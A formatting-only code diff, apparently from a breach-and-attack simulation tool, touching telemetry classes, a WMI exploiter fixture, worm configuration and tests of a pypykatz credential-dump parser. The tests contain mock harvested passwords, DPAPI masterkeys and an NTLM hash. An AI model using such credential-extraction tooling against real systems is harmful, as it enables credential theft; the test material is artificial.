"credtype": "wdigest",
"username": "monk3y",
"domainname": "ReAlDoMaIn",
"password": "canyoufindm3",
"luid": 123086,
}
],
"dpapi_creds":[
"dpapi_creds": [
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{"credtype":"dpapi", "key_guid":"9123-123ae123de4-121239-3123-421f"},
{"credtype": "dpapi", "key_guid": "9123-123ae123de4-121239-3123-421f"},
],
"kerberos_creds":[
"kerberos_creds": [
{
"credtype":"kerberos",
"username":"monkey_kerb",
"password":None,
"domainname":"ReAlDoMaIn",
"luid":123086,
"tickets":[],
"credtype": "kerberos",
"username": "monkey_kerb",
"password": None,
"domainname": "ReAlDoMaIn",
"luid": 123086,
"tickets": [],
}
],
"credman_creds":[
"credman_creds": [
{
"credtype":"credman",
"username":"monkey",
"domainname":"monkey.ad.monkey.com",
"password":"canyoufindme2",
"luid":123086,
"credtype": "credman",
"username": "monkey",
"domainname": "monkey.ad.monkey.com",
"password": "canyoufindme2",
"luid": 123086,
},
{
"credtype":"credman",
"username":"monkey@monkey.com",
"domainname":"moneky.monkey.com",
"password":"canyoufindme1",
"luid":123086,
"credtype": "credman",
"username": "monkey@monkey.com",
"domainname": "moneky.monkey.com",
"password": "canyoufindme1",
"luid": 123086,
},
{
"credtype":"credman",
"username":"test",
"domainname":"test.test.ts",
"password":"canyoufindit",
"luid":123086,
"credtype": "credman",
"username": "test",
"domainname": "test.test.ts",
"password": "canyoufindit",
"luid": 123086,
},
],
"tspkg_creds":[],
"tspkg_creds": [],
}
def test__get_creds_from_pypykatz_session(self):
@ -132,27 +128,27 @@ class TestPypykatzHandler(TestCase):
test_dicts = [
{
"username":"monkey",
"ntlm_hash":"31b73c59d7e0c089c031d6cfe0d16ae9",
"password":"",
"lm_hash":"",
"username": "monkey",
"ntlm_hash": "31b73c59d7e0c089c031d6cfe0d16ae9",
"password": "",
"lm_hash": "",
},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme", "lm_hash":""},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme", "lm_hash": ""},
{
"username":"monkey123",
"ntlm_hash":"",
"password":"canyoufindme123",
"lm_hash":"",
"username": "monkey123",
"ntlm_hash": "",
"password": "canyoufindme123",
"lm_hash": "",
},
{"username":"monk3y", "ntlm_hash":"", "password":"canyoufindm3", "lm_hash":""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme2", "lm_hash":""},
{"username": "monk3y", "ntlm_hash": "", "password": "canyoufindm3", "lm_hash": ""},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme2", "lm_hash": ""},
{
"username":"monkey@monkey.com",
"ntlm_hash":"",
"password":"canyoufindme1",
"lm_hash":"",
"username": "monkey@monkey.com",
"ntlm_hash": "",
"password": "canyoufindme1",
"lm_hash": "",
},
{"username":"test", "ntlm_hash":"", "password":"canyoufindit", "lm_hash":""},
{"username": "test", "ntlm_hash": "", "password": "canyoufindit", "lm_hash": ""},
]
results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts]

View File

@ -10,8 +10,8 @@ class WindowsCredentials:
def to_dict(self) -> Dict:
return {
"username":self.username,
"password":self.password,
"ntlm_hash":self.ntlm_hash,
"lm_hash":self.lm_hash,
"username": self.username,
"password": self.password,
"ntlm_hash": self.ntlm_hash,
"lm_hash": self.lm_hash,
}

View File

@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!!
#
WMI_LDAP_CLASSES = {
"ds_user":(
"ds_user": (
"DS_sAMAccountName",
"DS_userPrincipalName",
"DS_sAMAccountType",
@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount",
"DS_accountExpires",
),
"ds_group":(
"ds_group": (
"DS_whenChanged",
"DS_whenCreated",
"DS_sAMAccountName",
@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName",
"ADSIPath",
),
"ds_computer":(
"ds_computer": (
"DS_dNSHostName",
"ADSIPath",
"DS_accountExpires",

View File

@ -44,8 +44,7 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle:
LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
last_error
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK
def get_data(self):
return {"status":self.status.value, "technique":self.technique}
return {"status": self.status.value, "technique": self.technique}

View File

@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self):
data = super(T1005Telem, self).get_data()
data.update({"gathered_data_type":self.gathered_data_type, "info":self.info})
data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
return data

View File

@ -15,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self):
data = super(T1064Telem, self).get_data()
data.update({"usage":self.usage})
data.update({"usage": self.usage})
return data

View File

@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self):
data = super(T1105Telem, self).get_data()
data.update({"filename":self.filename, "src":self.src, "dst":self.dst})
data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
return data

View File

@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self):
data = super(T1107Telem, self).get_data()
data.update({"path":self.path})
data.update({"path": self.path})
return data

View File

@ -18,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self):
data = super(T1197Telem, self).get_data()
data.update({"usage":self.usage})
data.update({"usage": self.usage})
return data

View File

@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self):
data = super(T1222Telem, self).get_data()
data.update({"command":self.command})
data.update({"command": self.command})
return data

View File

@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self):
data = super(UsageTelem, self).get_data()
data.update({"usage":self.usage})
data.update({"usage": self.usage})
return data

View File

@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py
"""
super(VictimHostTelem, self).__init__(technique, status)
self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr}
self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
def get_data(self):
data = super(VictimHostTelem, self).get_data()
data.update({"machine":self.machine})
data.update({"machine": self.machine})
return data

View File

@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self):
return {
"result":self.result,
"machine":self.exploiter.host.__dict__,
"exploiter":self.exploiter.__class__.__name__,
"info":self.exploiter.exploit_info,
"attempts":self.exploiter.exploit_attempts,
"result": self.result,
"machine": self.exploiter.host.__dict__,
"exploiter": self.exploiter.__class__.__name__,
"info": self.exploiter.exploit_info,
"attempts": self.exploiter.exploit_attempts,
}

View File

@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self):
return {
"command":self.pba.command,
"result":self.result,
"name":self.pba.name,
"hostname":self.hostname,
"ip":self.ip,
"command": self.pba.command,
"result": self.result,
"name": self.pba.name,
"hostname": self.hostname,
"ip": self.ip,
}
@staticmethod

View File

@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN
def get_data(self):
return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)}
return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}

View File

@ -14,4 +14,4 @@ class ScoutSuiteTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCOUTSUITE
def get_data(self):
return {"data":self.provider_data}
return {"data": self.provider_data}

View File

@ -17,4 +17,4 @@ class StateTelem(BaseTelem):
telem_category = TelemCategoryEnum.STATE
def get_data(self):
return {"done":self.is_done, "version":self.version}
return {"done": self.is_done, "version": self.version}

View File

@ -16,7 +16,7 @@ def attack_telem_test_instance():
def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry):
attack_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":TECHNIQUE}
expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -18,10 +18,10 @@ def T1005_telem_test_instance():
def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry):
T1005_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1005",
"gathered_data_type":GATHERED_DATA_TYPE,
"info":INFO,
"status": STATUS.value,
"technique": "T1005",
"gathered_data_type": GATHERED_DATA_TYPE,
"info": INFO,
}
expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -16,7 +16,7 @@ def T1035_telem_test_instance():
def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry):
T1035_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1035", "usage":USAGE.name}
expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1064_telem_test_instance():
def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry):
T1064_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1064", "usage":USAGE_STR}
expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -19,11 +19,11 @@ def T1105_telem_test_instance():
def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry):
T1105_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1105",
"filename":FILENAME,
"src":SRC_IP,
"dst":DST_IP,
"status": STATUS.value,
"technique": "T1105",
"filename": FILENAME,
"src": SRC_IP,
"dst": DST_IP,
}
expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -16,7 +16,7 @@ def T1106_telem_test_instance():
def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry):
T1106_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1106", "usage":USAGE.name}
expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1107_telem_test_instance():
def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
T1107_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1107", "path":PATH}
expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1129_telem_test_instance():
def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry):
T1129_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1129", "usage":USAGE.name}
expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -21,10 +21,10 @@ def T1197_telem_test_instance():
def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry):
T1197_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1197",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
"usage":USAGE_STR,
"status": STATUS.value,
"technique": "T1197",
"machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"usage": USAGE_STR,
}
expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -21,10 +21,10 @@ def T1222_telem_test_instance():
def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry):
T1222_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1222",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
"command":COMMAND,
"status": STATUS.value,
"technique": "T1222",
"machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"command": COMMAND,
}
expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -18,9 +18,9 @@ def usage_telem_test_instance():
def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry):
usage_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":TECHNIQUE,
"usage":USAGE.name,
"status": STATUS.value,
"technique": TECHNIQUE,
"usage": USAGE.name,
}
expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -21,9 +21,9 @@ def victim_host_telem_test_instance():
def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry):
victim_host_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":TECHNIQUE,
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
"status": STATUS.value,
"technique": TECHNIQUE,
"machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
}
expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -10,24 +10,24 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
"ip_addr":IP,
"domain_name":DOMAIN_NAME,
"os":{},
"services":{},
"icmp":False,
"monkey_exe":None,
"default_tunnel":None,
"default_server":None,
"ip_addr": IP,
"domain_name": DOMAIN_NAME,
"os": {},
"services": {},
"icmp": False,
"monkey_exe": None,
"default_tunnel": None,
"default_server": None,
}
EXPLOITER = WmiExploiter(HOST)
EXPLOITER_NAME = "WmiExploiter"
EXPLOITER_INFO = {
"display_name":WmiExploiter._EXPLOITED_SERVICE,
"started":"",
"finished":"",
"vulnerable_urls":[],
"vulnerable_ports":[],
"executed_cmds":[],
"display_name": WmiExploiter._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
}
EXPLOITER_ATTEMPTS = []
RESULT = False
@ -41,11 +41,11 @@ def exploit_telem_test_instance():
def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry):
exploit_telem_test_instance.send()
expected_data = {
"result":RESULT,
"machine":HOST_AS_DICT,
"exploiter":EXPLOITER_NAME,
"info":EXPLOITER_INFO,
"attempts":EXPLOITER_ATTEMPTS,
"result": RESULT,
"machine": HOST_AS_DICT,
"exploiter": EXPLOITER_NAME,
"info": EXPLOITER_INFO,
"attempts": EXPLOITER_ATTEMPTS,
}
expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -20,18 +20,18 @@ class StubSomePBA:
@pytest.fixture
def post_breach_telem_test_instance(monkeypatch):
PBA = StubSomePBA()
monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda:(HOSTNAME, IP))
monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda: (HOSTNAME, IP))
return PostBreachTelem(PBA, RESULT)
def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry):
post_breach_telem_test_instance.send()
expected_data = {
"command":PBA_COMMAND,
"result":RESULT,
"name":PBA_NAME,
"hostname":HOSTNAME,
"ip":IP,
"command": PBA_COMMAND,
"result": RESULT,
"name": PBA_NAME,
"hostname": HOSTNAME,
"ip": IP,
}
expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -9,14 +9,14 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
"ip_addr":IP,
"domain_name":DOMAIN_NAME,
"os":{},
"services":{},
"icmp":False,
"monkey_exe":None,
"default_tunnel":None,
"default_server":None,
"ip_addr": IP,
"domain_name": DOMAIN_NAME,
"os": {},
"services": {},
"icmp": False,
"monkey_exe": None,
"default_tunnel": None,
"default_server": None,
}
HOST_SERVICES = {}
@ -28,7 +28,7 @@ def scan_telem_test_instance():
def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry):
scan_telem_test_instance.send()
expected_data = {"machine":HOST_AS_DICT, "service_count":len(HOST_SERVICES)}
expected_data = {"machine": HOST_AS_DICT, "service_count": len(HOST_SERVICES)}
expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -15,7 +15,7 @@ def state_telem_test_instance():
def test_state_telem_send(state_telem_test_instance, spy_send_telemetry):
state_telem_test_instance.send()
expected_data = {"done":IS_DONE, "version":VERSION}
expected_data = {"done": IS_DONE, "version": VERSION}
expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -14,7 +14,7 @@ def trace_telem_test_instance():
def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry):
trace_telem_test_instance.send()
expected_data = {"msg":MSG}
expected_data = {"msg": MSG}
expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -12,7 +12,7 @@ def tunnel_telem_test_instance():
def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry):
tunnel_telem_test_instance.send()
expected_data = {"proxy":None}
expected_data = {"proxy": None}
expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -21,4 +21,4 @@ class TraceTelem(BaseTelem):
telem_category = TelemCategoryEnum.TRACE
def get_data(self):
return {"msg":self.msg}
return {"msg": self.msg}

View File

@ -16,4 +16,4 @@ class TunnelTelem(BaseTelem):
telem_category = TelemCategoryEnum.TUNNEL
def get_data(self):
return {"proxy":self.proxy}
return {"proxy": self.proxy}

View File

@ -82,8 +82,7 @@ class AutoNewWindowsUser(AutoNewUser):
thread_handle = proc_info.hThread
logger.debug(
"Waiting for process to finish. Timeout: {}ms".format(
WAIT_TIMEOUT_IN_MILLISECONDS)
"Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
)
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f

View File

@ -46,8 +46,7 @@ class WindowsUpgrader(object):
)
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {
"monkey_path":WormConfiguration.dropper_target_path_win_64}
MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
+ monkey_options
)

View File

@ -175,7 +175,7 @@ def init_app(mongo_url):
app = Flask(__name__)
api = flask_restful.Api(app)
api.representations = {"application/json":output_json}
api.representations = {"application/json": output_json}
init_app_config(app, mongo_url)
init_app_services(app)

View File

@ -58,12 +58,12 @@ class EnvironmentConfig:
def to_dict(self) -> Dict:
config_dict = {
"server_config":self.server_config,
"deployment":self.deployment,
"data_dir":self.data_dir,
"server_config": self.server_config,
"deployment": self.deployment,
"data_dir": self.data_dir,
}
if self.aws:
config_dict.update({"aws":self.aws})
config_dict.update({"aws": self.aws})
config_dict.update(self.user_creds.to_dict())
return config_dict

View File

@ -13,9 +13,9 @@ STANDARD = "standard"
PASSWORD = "password"
ENV_DICT = {
STANDARD:standard.StandardEnvironment,
AWS:aws.AwsEnvironment,
PASSWORD:password.PasswordEnvironment,
STANDARD: standard.StandardEnvironment,
AWS: aws.AwsEnvironment,
PASSWORD: password.PasswordEnvironment,
}
env = None

View File

@ -9,13 +9,13 @@ class TestUserCreds(TestCase):
self.assertDictEqual(user_creds.to_dict(), {})
user_creds = UserCreds(username="Test")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test"})
self.assertDictEqual(user_creds.to_dict(), {"user": "Test"})
user_creds = UserCreds(password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"password_hash":"abc1231234"})
self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"})
user_creds = UserCreds(username="Test", password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test", "password_hash":"abc1231234"})
self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"})
def test_to_auth_user(self):
user_creds = UserCreds(username="Test", password_hash="abc1231234")

View File

@ -17,9 +17,9 @@ class UserCreds:
def to_dict(self) -> Dict:
cred_dict = {}
if self.username:
cred_dict.update({"user":self.username})
cred_dict.update({"user": self.username})
if self.password_hash:
cred_dict.update({"password_hash":self.password_hash})
cred_dict.update({"password_hash": self.password_hash})
return cred_dict
def to_auth_user(self) -> User:

Some files were not shown because too many files have changed in this diff